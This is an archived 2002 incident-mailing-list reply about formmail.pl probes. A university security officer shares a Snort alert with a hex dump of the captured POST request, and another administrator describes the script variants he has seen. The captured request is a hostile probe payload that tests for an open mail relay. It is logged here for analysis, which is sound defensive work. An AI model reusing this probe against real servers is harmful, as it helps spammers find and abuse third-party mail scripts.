I've been seeing these on my production network for almost 2 months now ... very anoying on my IIS Server with no Perl <g> I've seen 3 diffent scripts so far. 1 is very basic, only placing the site name in the message in plain text. The one you have I've also seen and the encoded text is a very detailed reporting of the found formmail script (which is why i say it's a different one). The last one i've seen so far is one referring to VOID realname= (looks script kiddie proofed ;). I'll dig up some traces for corelation. cheers, sunzi ----- Original Message ----- From: "Russell Fulton" <r.fultonat_private> To: <incidentsat_private> Sent: Wednesday, September 04, 2002 10:23 PM Subject: new type of formmail probes > Hi All, > Over the last week or so snort has been picking up many probes like > this: > > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > [**] WEB-CGI formmail arbitrary command execution attempt [**] > 09/05-01:24:57.641599 0:0:C:46:5C:D1 -> 0:E0:1E:8E:31:71 type:0x800 len:0x30F > 62.49.117.114:2645 -> 130.216.35.105:80 TCP TTL:107 TOS:0x0 ID:20226 IpLen:20 DgmLen:769 DF > ***AP*** Seq: 0x350A6D63 Ack: 0x5BFB5778 Win: 0x2238 TcpLen: 20 > 50 4F 53 54 20 2F 63 67 69 2D 62 69 6E 2F 66 6F POST /cgi-bin/fo > 72 6D 6D 61 69 6C 2E 70 6C 20 48 54 54 50 2F 31 rmmail.pl HTTP/1 > 2E 30 0D 0A 56 69 61 3A 20 31 2E 30 20 53 45 52 .0..Via: 1.0 SER > 56 45 52 0D 0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A VER..Connection: > 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A 43 6F 6E Keep-Alive..Con > 74 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 34 30 32 tent-Length: 402 > 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F ..User-Agent: Mo > 7A 69 6C 6C 61 2F 34 2E 30 36 20 28 57 69 6E 39 zilla/4.06 (Win9 > 35 3B 20 49 29 0D 0A 43 6F 6E 74 65 6E 74 2D 54 5; I)..Content-T > 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E ype: application > 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 /x-www-form-urle > 6E 63 6F 64 65 64 0D 0A 48 6F 73 74 3A 20 77 77 ncoded..Host: ww > 77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac > 2E 6E 7A 0D 0A 41 63 63 65 70 74 3A 20 69 6D 61 .nz..Accept: ima > 67 65 2F 67 69 66 2C 20 69 6D 61 67 65 2F 78 2D ge/gif, image/x- > 78 62 69 74 6D 61 70 2C 20 69 6D 61 67 65 2F 6A xbitmap, image/j > 70 65 67 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E peg, application > 2F 6D 73 77 6F 72 64 2C 20 2A 2F 2A 0D 0A 52 65 /msword, */*..Re > 66 65 72 65 72 3A 20 68 74 74 70 3A 2F 2F 77 77 ferer: http://ww > 77 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 w.cs.auckland.ac > 2E 6E 7A 0D 0A 0D 0A 65 6D 61 69 6C 3D 64 61 61 .nz....email=daa > 31 38 40 66 64 6A 31 30 2E 63 6F 6D 26 72 65 63 18at_private&rec > 69 70 69 65 6E 74 3D 3C 69 69 6B 65 73 74 79 78 ipient=<iikestyx > 40 61 6F 6C 2E 63 6F 6D 3E 77 77 77 2E 63 73 2E @aol.com>www.cs. > 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 26 73 auckland.ac.nz&s > 75 62 6A 65 63 74 3D 77 77 77 2E 63 73 2E 61 75 ubject=www.cs.au > 63 6B 6C 61 6E 64 2E 61 63 2E 6E 7A 25 32 46 63 ckland.ac.nz%2Fc > 67 69 2D 62 69 6E 25 32 46 66 6F 72 6D 6D 61 69 gi-bin%2Fformmai > 6C 2E 70 6C 25 32 30 25 32 30 25 32 30 25 32 30 l.pl%20%20%20%20 > 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 %20%20%20%20%20% > 32 30 25 32 30 25 32 30 25 32 30 25 32 30 6F 78 20%20%20%20%20ox > 79 35 32 26 3D 25 30 44 25 30 41 25 30 44 25 30 y52&=%0D%0A%0D%0 > 41 74 69 6D 65 25 32 46 64 61 74 65 25 33 41 25 Atime%2Fdate%3A% > 32 30 30 38 25 33 41 32 30 25 33 41 31 39 70 6D 2008%3A20%3A19pm > 25 32 30 25 32 46 25 32 30 30 39 25 32 46 30 34 %20%2F%2009%2F04 > 25 32 46 32 30 30 32 25 30 44 25 30 41 3C 41 25 %2F2002%0D%0A<A% > 32 30 48 52 45 46 25 33 44 25 32 32 77 77 77 2E 20HREF%3D%22www. > 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E 6E cs.auckland.ac.n > 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 6F z%2Fcgi-bin%2Ffo > 72 6D 6D 61 69 6C 2E 70 6C 25 32 32 3E 77 77 77 rmmail.pl%22>www > 2E 63 73 2E 61 75 63 6B 6C 61 6E 64 2E 61 63 2E .cs.auckland.ac. > 6E 7A 25 32 46 63 67 69 2D 62 69 6E 25 32 46 66 nz%2Fcgi-bin%2Ff > 6F 72 6D 6D 61 69 6C 2E 70 6C 3C 25 32 46 41 3E ormmail.pl<%2FA> > 25 30 44 25 30 41 25 30 44 25 30 41 25 30 44 25 %0D%0A%0D%0A%0D% > 30 41 25 30 44 25 30 41 25 30 44 25 30 41 25 30 0A%0D%0A%0D%0A%0 > 44 25 30 41 6F 78 79 35 32 D%0Aoxy52 > > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > Am I right in assuming that this just more spammers looking for places > to launder mail or is it more sinister than that? I.e. do we believe > the 'arbitrary command execution attempt' bit? > > Cheers, Russell. > > -- > Russell Fulton, Computer and Network Security Officer > The University of Auckland, New Zealand > > "It aint necessarily so" - Gershwin > > > -------------------------------------------------------------------------- -- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Sep 05 2002 - 11:00:22 PDT